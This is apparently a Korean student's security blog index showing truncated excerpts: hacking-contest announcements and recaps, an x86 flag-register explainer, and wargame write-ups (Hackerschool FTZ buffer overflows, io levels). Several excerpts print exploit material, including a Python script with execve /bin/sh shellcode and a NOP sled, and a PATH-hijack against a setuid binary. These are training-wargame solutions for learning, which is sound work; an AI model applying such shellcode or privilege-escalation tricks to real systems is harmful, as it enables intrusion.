아직멀긴했지만 중고생 정보보호 올림피아드 2011이라는 대회를 개최합니다. 예선과 본선으로 나누어져있어 온라인으로 진행되는 예선대회의 상위 20명이 오프라인으로 진행되는 본선에 참여하여 예선과 동일한 방식으로 대회를 진행해서 순위를 가려 상을 주는 방식입니다. 이번에도 호서전문학교 사이버해킹방어과에서 문제출제 및 운영을 하시는것같고요 , 작년과 가장크게 달라진점은 ..... "상금"입니다 ㅋㅋ 작년에 1위는 100만원 상당의 노트북이었었던거 같은데 , 이번에 1위는 행정안정부장관상 + 부상(현금300만원 or 300만원 상당의 부상)이네요 ! 1등상금뿐만 아니라 전체적인 상금도 올라갔구요 ㅋㅋㅋ (개인적으로 만약에 제가 상을탄다면 현금으로 받고싶네요 ㅋㅋㅋ) 시험기간이긴하지만 시간내셔서 참여해보시는것도 ..
전체 글
급하게 하던일도 정리됬고 , 다시 포스팅할수있겟네요 ㅎㅎ 8월 26일 아침 9시부터 저녁 6시까지 선린고의 해킹보안동아리인 Layer7에서 주최하는 해킹대회가 있었습니다. 작년에 컴퓨터공부를 시작하고 2번째로 참여했던 대회라 1년이 벌써 지나갔다는게 느껴지더군요 zㅋㅋㅋ 26일은 금요일이라 학교를 가야하는 날이긴하지만 , 선린고에서 참가 공문을 보내주어 집에서 편히 할 수 있었습니다. 9시30분 시작이라 9시쯤에 느긋하게 일어나서 노트북을 앞에두고 쇼파에 기대눈을 감았다가 뜨니 9시25분이었습니다.(?) 허둥지둥 대회사이트에 접속하고 네이트온에 접속했었는데 , 대회에 참가한다고했던 아는 동생이 네이트온에 접속하지않은걸보고 전화를 해주었더니 그때 일어났더군요 -_- ㅋㅋ 원래는 네이트온을 끄고하려고했으나..
올해에도 ISEC 2011 Conference와 CTF가 진행됩니다. Conference : http://www.isecconference.org/2011/ CTF qual : http://isec2011.wowhacker.com/ 이번에는 해커스쿨 & security proof 주최 해킹캠프와 CTF qual이 하루가 겹쳐서 저는 대회참가를 못할거같네요.
Category : System hacking ssh://ftz.hackerschool.org id : level13 pw : have no clue Summary : buffer overflow on redhat 6.2 서버에 접속하여 문제파일을 확인한다. [level13@ftz level13]$ ls -l 합계 28 -rwsr-x--- 1 level14 level13 13953 3월 8 2003 attackme -rw-r----- 1 root level13 258 3월 8 2003 hint drwxr-xr-x 2 root level13 4096 2월 24 2002 public_html drwxrwxr-x 2 root level13 4096 7월 21 03:58 tmp [level13@ftz level..
Category : System hacking ssh://ftz.hackerschool.org id : level12 pw : it is like this Summary : buffer overflow on redhat 6.2 서버에 접속하여 문제 파일을 확인한다. [level12@ftz level12]$ ls -l 합계 28 -rwsr-x--- 1 level13 level12 13771 3월 8 2003 attackme -rw-r----- 1 root level12 204 3월 8 2003 hint drwxr-xr-x 2 root level12 4096 2월 24 2002 public_html drwxrwxr-x 2 root level12 4096 7월 21 05:15 tmp [level12@ftz ..
1) Flag register Flag register는 CPU 내부 기구중 하나로 산술 연산 결과의 상태를 보여주는 flag bit들이 모인 레지스터이다. 산술 연산시 CPU에 의해 자동적으로 세팅되며 , 프로세서의 현재 상태를 결정한다. 상태레지스터라고 불리고 기종에 따라 condition register라고 불리기도한다. 상태 플래그 (Status flag) Carry Flag (CF) Unsigned overflow가 발생할 때 1로 세팅된다. Parity Flag (PF) 연산결과에 1인 bit의 개수가 짝수개이면 1 , 홀수개이면 0으로 세팅된다. Auxiliary Flag (AF) 연산결과 하위 4bit에 Unsigned overflow가 발생했을때 1로 세팅된다. Zero Flag (ZF)..
level5@io:/tmp/pwn3r$ cat exploit.py #!/usr/bin/python import os TARGET = "/levels/level05" SHELLCODE = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80" print "[!] Exploit started!" for i in range(0xff , 0x00 , -1): for j in range(0x01 , 0x100 , 100): payload = "" payload += "\x90" * 100 payload += SHELLCODE payload += "\x90" * (40 - len(SHEL..
level4@io:/tmp/.pwn3r$ ls -l /levels/level04* -r-sr-x--- 1 level5 level4 7016 Nov 16 2007 /levels/level04 -r-------- 1 level4 level4 65 Nov 16 2007 /levels/level04.c level4@io:/tmp/.pwn3r$ cat /levels/level04.c #include int main() { system("id"); return 0; } level4@io:/tmp/.pwn3r$ ls -l total 12 -rwxr-xr-x 1 level4 level4 6639 Apr 8 15:09 id -rw-r--r-- 1 level4 level4 89 Apr 8 15:09 id.c level4@..